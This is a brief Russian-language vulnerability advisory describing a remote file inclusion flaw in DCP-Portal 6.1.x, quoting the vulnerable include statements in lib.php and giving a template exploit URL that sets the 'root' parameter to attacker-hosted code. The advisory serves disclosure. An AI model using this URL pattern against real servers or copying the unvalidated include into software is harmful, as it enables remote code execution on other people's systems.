Программа: DCP-Portal 6.1.x

Удаленный пользователь может выполнить произвольные команды на сервере. Ошибка обнаружена в lib.php:

include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");

Из-за того, что переменная root не проверяется, нападающий может выполнить произвольный php-код.

Пример:

http://example/[dp_path]/library/lib.php?root=[cmd_url]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии